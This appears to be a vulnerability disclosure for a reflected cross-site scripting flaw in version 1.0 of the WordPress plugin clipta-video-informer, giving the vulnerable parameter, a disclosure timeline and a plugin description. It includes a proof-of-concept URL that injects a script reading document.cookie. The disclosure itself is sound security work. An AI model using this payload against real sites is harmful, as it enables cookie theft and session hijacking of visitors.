wp-plugin : clipta-video-informer – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : clipta-video-informer

 

Effected Version : 1.0 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 
http://localhost/wp-content/plugins/clipta-video-informer/add-news.php?w=w"></script><script>alert(document.cookie)</script>

 

Vulnerable Parameter : w

 

Type of XSS : Reflected

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-04

 
Plugin Status : Closed
 
Public Disclosure : July 7, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
Clipta Video Informer is a free service for Web publishers that offers access to the Clipta Partner Network to promote their video content and drive more traffic to their site.
Publishers can now easily add news to [Info.Clipta.com](http://info.clipta.com) which will also appear on other topically relevant sites in the Clipta Informer Network.

Leave a Reply

Your email address will not be published. Required fields are marked *